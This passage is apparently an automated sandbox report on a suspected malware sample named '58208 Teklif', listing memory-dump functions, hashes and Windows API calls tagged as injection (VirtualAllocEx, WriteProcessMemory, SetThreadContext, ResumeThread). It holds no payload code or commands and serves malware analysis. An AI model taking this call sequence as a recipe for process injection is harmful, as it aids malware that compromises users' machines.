                                                      • Opcode Fuzzy Hash: bea9ea4389d8e00f245d6a27e1ab8839e15c31d6a131e0886d952dc6ac31677d
                                                      • Instruction Fuzzy Hash: CA41F1B0C00719CFDB24CFAAC894B8DBBF5BF49304F60816AD408AB255EB756949CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 015544E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 575 15544e4-15559d9 CreateActCtxA 578 15559e2-1555a3c 575->578 579 15559db-15559e1 575->579 586 1555a3e-1555a41 578->586 587 1555a4b-1555a4f 578->587 579->578 586->587 588 1555a51-1555a5d 587->588 589 1555a60 587->589 588->589 590 1555a61 589->590 590->590
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015559C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 6724a220a71cecb18f35a829a66db54ed95581b3bf12f34cf1e886bd1e565c5a
                                                      • Instruction ID: 89ec5fa19e49e61562b4e713ad9edc0f7ea54d3421464f9b53bd7d9c038d376e
                                                      • Opcode Fuzzy Hash: 6724a220a71cecb18f35a829a66db54ed95581b3bf12f34cf1e886bd1e565c5a
                                                      • Instruction Fuzzy Hash: C54102B0C0071DCBDB24CFAAC894B9DBBF5BF49304F60806AD508AB255EB756949CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795B58 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 592 7795b58-7795bae 594 7795bbe-7795bfd WriteProcessMemory 592->594 595 7795bb0-7795bbc 592->595 597 7795bff-7795c05 594->597 598 7795c06-7795c36 594->598 595->594 597->598
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07795BF0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 9ec9527f8d508ca8c91a6099d484c090162ac66ef76e0f73311ebb42ddf7f4c9
                                                      • Instruction ID: 908c5ccb1941d2b2205043fb9afa4573f8f64f64342aef241c641ac7eeeb14e2
                                                      • Opcode Fuzzy Hash: 9ec9527f8d508ca8c91a6099d484c090162ac66ef76e0f73311ebb42ddf7f4c9
                                                      • Instruction Fuzzy Hash: FD2123B5D003199FCF10CFA9D9857EEBBF0FB48310F10882AE919A7250C7799955CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155D540 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 602 155d540-155d544 603 155d546-155d587 602->603 604 155d58a-155d5dc DuplicateHandle 602->604 603->604 605 155d5e5-155d602 604->605 606 155d5de-155d5e4 604->606 606->605
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D5CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 7232d8f0d58cbba24dd989bee4c715b3e6115c239dca2066e59168b172c016b0
                                                      • Instruction ID: af0e0cc9fb1c819daeff0a7db95bd728f6d24801d8e867e49884e7a2543c65a3
                                                      • Opcode Fuzzy Hash: 7232d8f0d58cbba24dd989bee4c715b3e6115c239dca2066e59168b172c016b0
                                                      • Instruction Fuzzy Hash: CF3139B58002499FDB11CFA9D584ADEBFF4FF49324F14815AE958A7350C375A941CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795B60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 609 7795b60-7795bae 611 7795bbe-7795bfd WriteProcessMemory 609->611 612 7795bb0-7795bbc 609->612 614 7795bff-7795c05 611->614 615 7795c06-7795c36 611->615 612->611 614->615
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07795BF0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 320105237739d29c2265ff03bf7dc023d86fbb3b68205455a14561aa952a8fc9
                                                      • Instruction ID: 73392f1a595d4dfcb386aa9f25223ccfd019896603ef102446de544f74ebe5ec
                                                      • Opcode Fuzzy Hash: 320105237739d29c2265ff03bf7dc023d86fbb3b68205455a14561aa952a8fc9
                                                      • Instruction Fuzzy Hash: 8A2125B19003599FCF10DFA9D885BEEBBF5FF48310F50882AE919A7240C7799954CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795C48 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 619 7795c48-7795cdd ReadProcessMemory 622 7795cdf-7795ce5 619->622 623 7795ce6-7795d16 619->623 622->623
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07795CD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: a607ae9690a45ed9dc2d2d9b21f3f06ee6482626374fb46664acb6e0e2474665
                                                      • Instruction ID: da58bef2017fb5f4a9704e1d2b7b743e1295c4596abdad4846b487e909bbf6a4
                                                      • Opcode Fuzzy Hash: a607ae9690a45ed9dc2d2d9b21f3f06ee6482626374fb46664acb6e0e2474665
                                                      • Instruction Fuzzy Hash: 8C2136B1D003199FCB10DFA9D9816EEBBF4FF48314F10842AE919A7240C7359945DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795C50 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07795CD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 96f8f66c27689153d1e577626ba2b90bea18f9c6abc2088a1f97bbefc110dbbc
                                                      • Instruction ID: 1dc3f1065d6d626a94f6e7f6ff396c70319bf49b04b18ef58bab8b72a8d1fd03
                                                      • Opcode Fuzzy Hash: 96f8f66c27689153d1e577626ba2b90bea18f9c6abc2088a1f97bbefc110dbbc
                                                      • Instruction Fuzzy Hash: 862145B1C003199FCB10DFAAD881AEEFBF4FF48310F50842AE919A7240C7399944CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077959C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 627 77959c8-7795a13 629 7795a23-7795a53 Wow64SetThreadContext 627->629 630 7795a15-7795a21 627->630 632 7795a5c-7795a8c 629->632 633 7795a55-7795a5b 629->633 630->629 633->632
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07795A46
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 9c1e0825a7398f95713d985c533c90cc9ed31e5839cc7926e396698aed8792bb
                                                      • Instruction ID: 43bc751c2d2bc995b8539435a400b9254d277fd8d048bcab74eade629245e318
                                                      • Opcode Fuzzy Hash: 9c1e0825a7398f95713d985c533c90cc9ed31e5839cc7926e396698aed8792bb
                                                      • Instruction Fuzzy Hash: 6A2134B1D002198FDB10DFAAD485BEEBFF4EB48324F50842AD519A7241CB78A945CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155D548 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D5CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 46193974b066bde319982b13f8d8d6577be162ebd11a91d49ab3db5fc4a3a6ef
                                                      • Instruction ID: 70909218702455a4b8c5776719d53810687be942201829e600833f4f5e7d0ccd
                                                      • Opcode Fuzzy Hash: 46193974b066bde319982b13f8d8d6577be162ebd11a91d49ab3db5fc4a3a6ef
                                                      • Instruction Fuzzy Hash: 7021C2B5900248AFDB10DFAAD984ADEBFF8FB48314F14841AE918A7350D375A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077959C7 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07795A46
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: fe8a6bb261a17027e11dbd020da5a6d6fca96bcccf8a141c14ee0dfa5ff3c178
                                                      • Instruction ID: e3d79de750a93b4c4c97432cb9d0f6726c605a810c25671a7773b8d0c6a45ef5
                                                      • Opcode Fuzzy Hash: fe8a6bb261a17027e11dbd020da5a6d6fca96bcccf8a141c14ee0dfa5ff3c178
                                                      • Instruction Fuzzy Hash: 7D2133B1D002198FDB10DFAAD5857EEBBF4EF48324F14842AD519B7281CB789945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795A98 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07795B0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: abe2fe3a9106d998ef1498577446ffc07967f1e607419b9743127671d69b2abe
                                                      • Instruction ID: 1a3e0809d00d549b95bcb6013e099e66c5e87a0145798c2b3eb72e0338c66859
                                                      • Opcode Fuzzy Hash: abe2fe3a9106d998ef1498577446ffc07967f1e607419b9743127671d69b2abe
                                                      • Instruction Fuzzy Hash: 251164B6D002089FCB11CFA9C945AEEBFF5EF48324F20881AD519A7250C7369905CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155AD1C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0155B339,00000800,00000000,00000000), ref: 0155B54A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 34201943c7d26ee967bffde703953349f45b8bc57cc20396d3a2f5dd7eec1027
                                                      • Instruction ID: 35a393eb42b8d5dd199600ca51ca312634628dead7e8c288c3bf3aee99555abf
                                                      • Opcode Fuzzy Hash: 34201943c7d26ee967bffde703953349f45b8bc57cc20396d3a2f5dd7eec1027
                                                      • Instruction Fuzzy Hash: B61114B69003089FDB24CF9AD448AAEFBF5FB48314F14842ED919BB200D375A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155B4D9 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0155B339,00000800,00000000,00000000), ref: 0155B54A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: ff168b139385d025edea763af2e49c24e9abe9b55539b0524e5c2caca036c17a
                                                      • Instruction ID: 39fff693fdb045158cf83f7d4ff9143e46c9d36e657a014f6370730179f878fe
                                                      • Opcode Fuzzy Hash: ff168b139385d025edea763af2e49c24e9abe9b55539b0524e5c2caca036c17a
                                                      • Instruction Fuzzy Hash: C11103B69002089FDB24CFAAD488AEEFBF5BB88314F14841AD919B7200C375A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795AA0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07795B0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 967bb38edec76b49dda6ecd3cc3b9032b46d1c7c9caa88af52d9dc7dbc935eac
                                                      • Instruction ID: 4ad5ef22b9e1aee98f4d13c060a369850624ce1691213310cc81a167dcda3517
                                                      • Opcode Fuzzy Hash: 967bb38edec76b49dda6ecd3cc3b9032b46d1c7c9caa88af52d9dc7dbc935eac
                                                      • Instruction Fuzzy Hash: 241167B19002499FCF10DFAAD845ADEBFF5EF48320F108819E519A7250C776A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077954E0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 071a6c9600f5fc6c0c8d361e5bb376717e189d90f1ec87c0087a1a6b6d7a65c0
                                                      • Instruction ID: acb58037abf1cb16f5dedf49c2ee759fb35749495185b34d18ca9e98e05a8d94
                                                      • Opcode Fuzzy Hash: 071a6c9600f5fc6c0c8d361e5bb376717e189d90f1ec87c0087a1a6b6d7a65c0
                                                      • Instruction Fuzzy Hash: 92116AB1D003488FCB20DFAAD4457DEFBF5AB88324F208429D519A7240C775A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07794408 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0779811D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: ab90fbce08fc2224c6dc5b89e4f0cb2509d7a020be30aab16707f93dec496015
                                                      • Instruction ID: db91892ecb24bd7a780d4a1db24ea4797e0d621c45bfcacd29a03c5d123adba0
                                                      • Opcode Fuzzy Hash: ab90fbce08fc2224c6dc5b89e4f0cb2509d7a020be30aab16707f93dec496015
                                                      • Instruction Fuzzy Hash: 7411F2B5800349DFDB10DF9AD849BDEBBF8EB49310F10881AE919B7200D375A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077954DF Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 2cf861d71768e53d0e15ea76845fbfef2d65d7cb2d8ed811bd7dea2b65087b15
                                                      • Instruction ID: b463506a094cc7f9759b8d7b811b0a99d217c645e16b3a0dd68df0c6c5b82abd
                                                      • Opcode Fuzzy Hash: 2cf861d71768e53d0e15ea76845fbfef2d65d7cb2d8ed811bd7dea2b65087b15
                                                      • Instruction Fuzzy Hash: 891166B1D002488ECB20DFA9D5457EEFBF5AF48324F20882AD519B7240C735A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077991A0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 077991F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 3e907ab6d258d58182f59ba35174cc452829d2bc99e542255f22df03751562ac
                                                      • Instruction ID: 9fa4b2687eeb518846b672f260f0ff06aa87c464e61d42d1b15dc4bd8070ee89
                                                      • Opcode Fuzzy Hash: 3e907ab6d258d58182f59ba35174cc452829d2bc99e542255f22df03751562ac
                                                      • Instruction Fuzzy Hash: 951145B5800349CFDB10DF9AD549BDEBBF4EB48320F11842AD919A7340D339A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07799198 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 077991F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 6cfc4660c4f10e2afeb93f4f13b182495fe2aa5ed158874f1de62cbc7d0327e1
                                                      • Instruction ID: d42823c6e5eb300c8a4844c683751672c1eb95b40c038b9bbb77c267710bca60
                                                      • Opcode Fuzzy Hash: 6cfc4660c4f10e2afeb93f4f13b182495fe2aa5ed158874f1de62cbc7d0327e1
                                                      • Instruction Fuzzy Hash: 651133B6800349CFDB10DF99D549BDEBBF4FB48320F11882AD969A7240D339A644CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155B258 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0155B2BE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 823a65fd87379b91d4985e2c93b5217bf8501ef1186d4e7f2654e8fa2e23281f
                                                      • Instruction ID: 7a89138d036a705bcd334dd62b7e658980d91baef8616919fbfb6b889c8416e3
                                                      • Opcode Fuzzy Hash: 823a65fd87379b91d4985e2c93b5217bf8501ef1186d4e7f2654e8fa2e23281f
                                                      • Instruction Fuzzy Hash: 581110B5C003498FDB10CF9AD448ADEFBF5AF88314F11841AD929BB600C375A545CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077980B8 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0779811D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 8e3440e0e5ea7087677c316adaea71b9ce794ba85d940e9e00c127917f6cafb1
                                                      • Instruction ID: a3aeeeb7c1bcc6e910e237c0ec4d76bf2971740da2119ac623bc72a8fb82d5f2
                                                      • Opcode Fuzzy Hash: 8e3440e0e5ea7087677c316adaea71b9ce794ba85d940e9e00c127917f6cafb1
                                                      • Instruction Fuzzy Hash: 9C11B0B58002499FDB10DF99D949BDEBBF4AB48310F25881AD519A7600D375A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014FD4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318416703.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_14fd000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d0cf4919da9cdbca9ef18b99d9615da210a359ff9f97f2c90482a5afb2cdb5d
                                                      • Instruction ID: 08a0ad850e0bdbd0b40d13f43a2db04b6db2748e66a1326d7343e06f89d823f4
                                                      • Opcode Fuzzy Hash: 8d0cf4919da9cdbca9ef18b99d9615da210a359ff9f97f2c90482a5afb2cdb5d
                                                      • Instruction Fuzzy Hash: 0121F871904244DFDB05DF58D9C4B27BF65FB88318F24C56EEA090B366C336D456C6A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014FD3D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318416703.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_14fd000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a878cbf1eb384d5cc276061eae91cee744b8ca7861fde8e7ee57eb204c41f7a6
                                                      • Instruction ID: f25736740727e503dac7e1106d43de63699555047af0c5b53019b336922cdf7b
                                                      • Opcode Fuzzy Hash: a878cbf1eb384d5cc276061eae91cee744b8ca7861fde8e7ee57eb204c41f7a6
                                                      • Instruction Fuzzy Hash: E721F471904204DFDB05DF58D9C0B56BF65FB88314F20C17EEA090B36AC336E456CAA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0150D1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318487544.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_150d000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 23b114a4f081f423157e8e33d6ca044c7159a6f429966744ef1390ce70574c5a
                                                      • Instruction ID: 8fb352f8c618afcdd42f618c37f03fc816c7021e30c046225ef83a687dfd899b
                                                      • Opcode Fuzzy Hash: 23b114a4f081f423157e8e33d6ca044c7159a6f429966744ef1390ce70574c5a
                                                      • Instruction Fuzzy Hash: 6F210771504205EFDB06DFD8D5C0B26BBB5FB84324F20C96DE9094F296C33AD406CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0150D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318487544.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_150d000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f5c9968b9266a708789e52d18144ef228d6f2f342604e8e9a1234f1ab5195a8
                                                      • Instruction ID: bb4a3dc884da47010fc4dc2917dac08a2e8f68a117626417804b7782d38f8142
                                                      • Opcode Fuzzy Hash: 6f5c9968b9266a708789e52d18144ef228d6f2f342604e8e9a1234f1ab5195a8
                                                      • Instruction Fuzzy Hash: B0210075604204DFDB16DFD8D990B26BBB5FB88314F20C969E80E4F296D33AD406CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0150D006 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318487544.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_150d000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6cd65d79723dc3d1127b90e51e9e84fd02f73ac5c0b5e03a9aa0fde992091b13
                                                      • Instruction ID: 1615aac511abc07fc35f2396e8835fc39b59ae5934490d32766ecc836ea6d895
                                                      • Opcode Fuzzy Hash: 6cd65d79723dc3d1127b90e51e9e84fd02f73ac5c0b5e03a9aa0fde992091b13
                                                      • Instruction Fuzzy Hash: 162192755093808FDB03CFA4D994715BF71FB46214F29C5DAD8498F6A7C33A980ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014FD3D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
